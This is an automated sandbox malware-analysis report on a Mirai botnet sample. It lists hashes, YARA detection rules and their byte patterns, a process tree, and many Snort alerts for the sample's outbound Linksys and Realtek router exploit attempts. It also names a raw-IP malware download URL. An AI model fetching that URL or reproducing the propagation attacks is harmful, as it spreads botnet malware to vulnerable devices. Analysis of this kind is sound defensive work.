Edit tour

Linux Analysis Report
qJlf2SjoW4

Overview

General Information

Sample Name:	qJlf2SjoW4
Analysis ID:	626436
MD5:	e584f83cd9c878432f7b464ffd70b162
SHA1:	1f8ff3ba2051f76fc89641dfba00af74e15ad72a
SHA256:	b588d161f6930e582cfd72687ac7d9cf3e1a4884c49a2ca61163d40b2228d491
Tags:	32elfmirairenesas
Infos:

Detection

Mirai

Score:	92
Range:	0 - 100
Whitelisted:	false

Signatures

Yara detected Mirai

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Snort IDS alert for network traffic

Connects to many ports of the same IP (likely port scanning)

Uses known network protocols on non-standard ports

Sample tries to kill multiple processes (SIGKILL)

Yara signature match

Uses the "uname" system call to query kernel version information (possible evasion)

Enumerates processes within the "proc" file system

Detected TCP or UDP traffic on non-standard ports

Sample listens on a socket

Sample tries to kill a process (SIGKILL)

Sample has stripped symbol table

HTTP GET or POST without a user agent

Executes the "rm" command used to delete files or directories

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.

Static ELF header machine description suggests that the sample might not execute correctly on this machine.

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	626436
Start date and time: 14/05/202202:10:58	2022-05-14 02:10:58 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 28s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	qJlf2SjoW4
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Detection:	MAL
Classification:	mal92.spre.troj.lin@0/0@0/0

Warnings

Report size exceeded maximum capacity and may have missing network information.
TCP Packets have been reduced to 100
VT rate limit hit for: http://103.136.43.52/bins/Tsunami.x86

Runtime Messages

Command:	/tmp/qJlf2SjoW4
PID:	6232
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:	kebabware installed
Standard Error:

Process Tree

system is lnxubuntu20

qJlf2SjoW4 (PID: 6232, Parent: 6122, MD5: 8943e5f8f8c280467b4472c15ae93ba9) Arguments: /tmp/qJlf2SjoW4

qJlf2SjoW4 New Fork (PID: 6234, Parent: 6232)

qJlf2SjoW4 New Fork (PID: 6236, Parent: 6234)

qJlf2SjoW4 New Fork (PID: 6237, Parent: 6234)

qJlf2SjoW4 New Fork (PID: 6238, Parent: 6234)

qJlf2SjoW4 New Fork (PID: 6242, Parent: 6234)

qJlf2SjoW4 New Fork (PID: 6244, Parent: 6234)

qJlf2SjoW4 New Fork (PID: 6246, Parent: 6234)

qJlf2SjoW4 New Fork (PID: 6247, Parent: 6234)

qJlf2SjoW4 New Fork (PID: 6248, Parent: 6234)

gnome-session-binary New Fork (PID: 6289, Parent: 1477)

sh (PID: 6289, Parent: 1477, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-print-notifications

gsd-print-notifications (PID: 6289, Parent: 1477, MD5: 71539698aa691718cee775d6b9450ae2) Arguments: /usr/libexec/gsd-print-notifications

gsd-print-notifications New Fork (PID: 6297, Parent: 6289)

gsd-print-notifications New Fork (PID: 6298, Parent: 6297)

gsd-printer (PID: 6298, Parent: 1, MD5: 7995828cf98c315fd55f2ffb3b22384d) Arguments: /usr/libexec/gsd-printer

xfce4-session New Fork (PID: 6319, Parent: 1900)

rm (PID: 6319, Parent: 1900, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /home/saturnino/.cache/sessions/Thunar-2ec9153f1-6fa0-4067-96b1-e5fe875b1e51

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
qJlf2SjoW4	SUSP_XORed_Mozilla	Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key.	Florian Roth	0x113e8:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3 0x11444:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3 0x114e0:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
qJlf2SjoW4	MAL_ELF_LNX_Mirai_Oct10_2	Detects ELF malware Mirai related	Florian Roth	0x1068c:$c01: 50 4F 53 54 20 2F 63 64 6E 2D 63 67 69 2F 00 00 20 48 54 54 50 2F 31 2E 31 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 00 0D 0A 48 6F 73 74 3A
qJlf2SjoW4	JoeSecurity_Mirai_5	Yara detected Mirai	Joe Security
qJlf2SjoW4	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
6232.1.0000000085a0537c.000000003b1b2593.rw-.sdmp	SUSP_XORed_Mozilla	Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key.	Florian Roth	0x4f0:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3 0x560:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3 0x620:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
6236.1.0000000085a0537c.000000003b1b2593.rw-.sdmp	SUSP_XORed_Mozilla	Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key.	Florian Roth	0x4f0:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3 0x560:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3 0x620:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
6232.1.000000005174e606.000000008584956c.r-x.sdmp	SUSP_XORed_Mozilla	Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key.	Florian Roth	0x113e8:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3 0x11444:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3 0x114e0:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
6232.1.000000005174e606.000000008584956c.r-x.sdmp	MAL_ELF_LNX_Mirai_Oct10_2	Detects ELF malware Mirai related	Florian Roth	0x1068c:$c01: 50 4F 53 54 20 2F 63 64 6E 2D 63 67 69 2F 00 00 20 48 54 54 50 2F 31 2E 31 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 00 0D 0A 48 6F 73 74 3A
6232.1.000000005174e606.000000008584956c.r-x.sdmp	JoeSecurity_Mirai_5	Yara detected Mirai	Joe Security
6232.1.000000005174e606.000000008584956c.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6236.1.000000005174e606.000000008584956c.r-x.sdmp	SUSP_XORed_Mozilla	Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key.	Florian Roth	0x113e8:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3 0x11444:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3 0x114e0:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
6236.1.000000005174e606.000000008584956c.r-x.sdmp	MAL_ELF_LNX_Mirai_Oct10_2	Detects ELF malware Mirai related	Florian Roth	0x1068c:$c01: 50 4F 53 54 20 2F 63 64 6E 2D 63 67 69 2F 00 00 20 48 54 54 50 2F 31 2E 31 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 00 0D 0A 48 6F 73 74 3A
6236.1.000000005174e606.000000008584956c.r-x.sdmp	JoeSecurity_Mirai_5	Yara detected Mirai	Joe Security
6236.1.000000005174e606.000000008584956c.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
Click to see the 5 entries

Snort Signatures

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.58.74.10

Timestamp:	192.168.2.2395.58.74.1040992802027121 05/14/22-02:12:12.430631
SID:	2027121
Source Port:	40992
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 112.199.99.106

Timestamp:	192.168.2.23112.199.99.10646420802027121 05/14/22-02:11:57.622916
SID:	2027121
Source Port:	46420
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.168.221.107

Timestamp:	192.168.2.2395.168.221.10733586802027121 05/14/22-02:12:03.534733
SID:	2027121
Source Port:	33586
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 88.166.177.101

Timestamp:	192.168.2.2388.166.177.10143818802027121 05/14/22-02:13:00.629220
SID:	2027121
Source Port:	43818
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.100.34.126

Timestamp:	192.168.2.2395.100.34.12649972802027121 05/14/22-02:12:08.603488
SID:	2027121
Source Port:	49972
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.100.94.179

Timestamp:	192.168.2.2395.100.94.17943008802027121 05/14/22-02:12:47.773346
SID:	2027121
Source Port:	43008
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.97.118.83

Timestamp:	192.168.2.2395.97.118.8352268802027121 05/14/22-02:13:23.496514
SID:	2027121
Source Port:	52268
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.217.218.159

Timestamp:	192.168.2.2395.217.218.15945052802027121 05/14/22-02:12:01.397227
SID:	2027121
Source Port:	45052
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.216.95.113

Timestamp:	192.168.2.2395.216.95.11347718802027121 05/14/22-02:11:52.570414
SID:	2027121
Source Port:	47718
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.81.184.184

Timestamp:	192.168.2.23172.81.184.18459202555552027153 05/14/22-02:13:37.089436
SID:	2027153
Source Port:	59202
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound - Source IP: 192.168.2.23 - Destination IP: 156.226.67.163

Timestamp:	192.168.2.23156.226.67.16341018528692027339 05/14/22-02:12:09.245036
SID:	2027339
Source Port:	41018
Destination Port:	52869
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.78.119.72

Timestamp:	192.168.2.2395.78.119.7247502802027121 05/14/22-02:11:52.607486
SID:	2027121
Source Port:	47502
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.100.118.204

Timestamp:	192.168.2.2395.100.118.20437132802027121 05/14/22-02:11:52.802504
SID:	2027121
Source Port:	37132
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.58.76.92

Timestamp:	192.168.2.2395.58.76.9256110802027121 05/14/22-02:12:10.137372
SID:	2027121
Source Port:	56110
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.100.32.178

Timestamp:	192.168.2.2395.100.32.17844078802027121 05/14/22-02:12:38.576645
SID:	2027121
Source Port:	44078
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.245.91.218

Timestamp:	192.168.2.23172.245.91.21846486555552027153 05/14/22-02:11:53.481665
SID:	2027153
Source Port:	46486
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.101.211.181

Timestamp:	192.168.2.2395.101.211.18138602802027121 05/14/22-02:11:46.055471
SID:	2027121
Source Port:	38602
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound - Source IP: 192.168.2.23 - Destination IP: 156.250.7.208

Timestamp:	192.168.2.23156.250.7.20843406528692027339 05/14/22-02:12:44.093160
SID:	2027339
Source Port:	43406
Destination Port:	52869
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.211.199.200

Timestamp:	192.168.2.2395.211.199.20060430802027121 05/14/22-02:11:50.384445
SID:	2027121
Source Port:	60430
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound - Source IP: 192.168.2.23 - Destination IP: 156.240.107.73

Timestamp:	192.168.2.23156.240.107.7347070528692027339 05/14/22-02:12:25.163577
SID:	2027339
Source Port:	47070
Destination Port:	52869
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.182.213

Timestamp:	192.168.2.23172.65.182.21341474555552027153 05/14/22-02:12:39.507650
SID:	2027153
Source Port:	41474
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound - Source IP: 192.168.2.23 - Destination IP: 156.244.105.51

Timestamp:	192.168.2.23156.244.105.5134840528692027339 05/14/22-02:13:21.351383
SID:	2027339
Source Port:	34840
Destination Port:	52869
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.101.243.199

Timestamp:	192.168.2.2395.101.243.19935434802027121 05/14/22-02:12:04.777246
SID:	2027121
Source Port:	35434
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.245.250.172

Timestamp:	192.168.2.23172.245.250.17236862555552027153 05/14/22-02:12:19.660814
SID:	2027153
Source Port:	36862
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.211.226.138

Timestamp:	192.168.2.2395.211.226.13853290802027121 05/14/22-02:11:52.555956
SID:	2027121
Source Port:	53290
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.43.238.153

Timestamp:	192.168.2.2395.43.238.15338478802027121 05/14/22-02:12:01.401310
SID:	2027121
Source Port:	38478
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.37.250

Timestamp:	192.168.2.23172.65.37.25050424555552027153 05/14/22-02:12:56.874950
SID:	2027153
Source Port:	50424
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.213.204.39

Timestamp:	192.168.2.2395.213.204.3958836802027121 05/14/22-02:12:23.962062
SID:	2027121
Source Port:	58836
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.181.133.202

Timestamp:	192.168.2.2395.181.133.20233726802027121 05/14/22-02:12:16.233664
SID:	2027121
Source Port:	33726
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.57.130.228

Timestamp:	192.168.2.2395.57.130.22852484802027121 05/14/22-02:12:28.116329
SID:	2027121
Source Port:	52484
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.216.222.10

Timestamp:	192.168.2.2395.216.222.1047996802027121 05/14/22-02:12:06.989256
SID:	2027121
Source Port:	47996
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 88.122.230.167

Timestamp:	192.168.2.2388.122.230.16741686802027121 05/14/22-02:13:08.893196
SID:	2027121
Source Port:	41686
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 88.150.159.106

Timestamp:	192.168.2.2388.150.159.10657996802027121 05/14/22-02:12:39.841136
SID:	2027121
Source Port:	57996
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound - Source IP: 192.168.2.23 - Destination IP: 156.235.111.198

Timestamp:	192.168.2.23156.235.111.19833534528692027339 05/14/22-02:13:20.938260
SID:	2027339
Source Port:	33534
Destination Port:	52869
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.24.98

Timestamp:	192.168.2.23172.65.24.9855186555552027153 05/14/22-02:12:20.938724
SID:	2027153
Source Port:	55186
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.179.134.10

Timestamp:	192.168.2.2395.179.134.1036172802027121 05/14/22-02:12:25.912986
SID:	2027121
Source Port:	36172
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.101.105.37

Timestamp:	192.168.2.2395.101.105.3756502802027121 05/14/22-02:12:16.074396
SID:	2027121
Source Port:	56502
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.164.218.83

Timestamp:	192.168.2.2395.164.218.8357352802027121 05/14/22-02:12:33.749896
SID:	2027121
Source Port:	57352
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.159.26.35

Timestamp:	192.168.2.2395.159.26.3544678802027121 05/14/22-02:12:23.922852
SID:	2027121
Source Port:	44678
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound - Source IP: 192.168.2.23 - Destination IP: 156.235.96.90

Timestamp:	192.168.2.23156.235.96.9045400528692027339 05/14/22-02:12:34.950230
SID:	2027339
Source Port:	45400
Destination Port:	52869
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.217.206.177

Timestamp:	192.168.2.2395.217.206.17745218802027121 05/14/22-02:12:04.810301
SID:	2027121
Source Port:	45218
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 88.49.177.249

Timestamp:	192.168.2.2388.49.177.24935962802027121 05/14/22-02:13:40.811485
SID:	2027121
Source Port:	35962
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.131.158.159

Timestamp:	192.168.2.2395.131.158.15946656802027121 05/14/22-02:12:31.381907
SID:	2027121
Source Port:	46656
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.201.241

Timestamp:	192.168.2.23172.65.201.24153716555552027153 05/14/22-02:12:16.062221
SID:	2027153
Source Port:	53716
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.100.82.234

Timestamp:	192.168.2.2395.100.82.23444534802027121 05/14/22-02:12:12.340577
SID:	2027121
Source Port:	44534
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.118.147

Timestamp:	192.168.2.23172.65.118.14737452555552027153 05/14/22-02:11:50.031237
SID:	2027153
Source Port:	37452
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.57.134.46

Timestamp:	192.168.2.2395.57.134.4659286802027121 05/14/22-02:12:48.996838
SID:	2027121
Source Port:	59286
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.172.41

Timestamp:	192.168.2.23172.65.172.4134814555552027153 05/14/22-02:13:11.806884
SID:	2027153
Source Port:	34814
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.210.229

Timestamp:	192.168.2.23172.65.210.22942204555552027153 05/14/22-02:12:18.507816
SID:	2027153
Source Port:	42204
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.94.218.43

Timestamp:	192.168.2.2395.94.218.4357504802027121 05/14/22-02:11:57.972753
SID:	2027121
Source Port:	57504
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.154.249.121

Timestamp:	192.168.2.2395.154.249.12134130802027121 05/14/22-02:12:45.473782
SID:	2027121
Source Port:	34130
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.128.245

Timestamp:	192.168.2.23172.65.128.24559816555552027153 05/14/22-02:13:11.806767
SID:	2027153
Source Port:	59816
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.101.96.51

Timestamp:	192.168.2.2395.101.96.5152158802027121 05/14/22-02:13:29.557034
SID:	2027121
Source Port:	52158
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 88.203.246.62

Timestamp:	192.168.2.2388.203.246.6251484802027121 05/14/22-02:12:51.238182
SID:	2027121
Source Port:	51484
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.90.162.183

Timestamp:	192.168.2.2395.90.162.18347524802027121 05/14/22-02:12:04.810631
SID:	2027121
Source Port:	47524
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.239.27.78

Timestamp:	192.168.2.2395.239.27.7847704802027121 05/14/22-02:13:06.625005
SID:	2027121
Source Port:	47704
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.100.205.70

Timestamp:	192.168.2.2395.100.205.7053328802027121 05/14/22-02:12:03.636693
SID:	2027121
Source Port:	53328
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.151.77

Timestamp:	192.168.2.23172.65.151.7759744555552027153 05/14/22-02:11:51.219344
SID:	2027153
Source Port:	59744
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.100.59.120

Timestamp:	192.168.2.2395.100.59.12043352802027121 05/14/22-02:11:45.945989
SID:	2027121
Source Port:	43352
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.153.173

Timestamp:	192.168.2.23172.65.153.17343894555552027153 05/14/22-02:13:39.296017
SID:	2027153
Source Port:	43894
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.164.217.32

Timestamp:	192.168.2.2395.164.217.3256864802027121 05/14/22-02:12:21.706568
SID:	2027121
Source Port:	56864
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.209.130.241

Timestamp:	192.168.2.2395.209.130.24155784802027121 05/14/22-02:12:28.187173
SID:	2027121
Source Port:	55784
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 88.210.164.58

Timestamp:	192.168.2.2388.210.164.5859344802027121 05/14/22-02:13:46.124204
SID:	2027121
Source Port:	59344
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.250.151

Timestamp:	192.168.2.23172.65.250.15159336555552027153 05/14/22-02:13:19.724871
SID:	2027153
Source Port:	59336
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.216.165.118

Timestamp:	192.168.2.2395.216.165.11859550802027121 05/14/22-02:12:33.730744
SID:	2027121
Source Port:	59550
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.229.119.87

Timestamp:	192.168.2.2395.229.119.8750144802027121 05/14/22-02:12:16.135372
SID:	2027121
Source Port:	50144
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

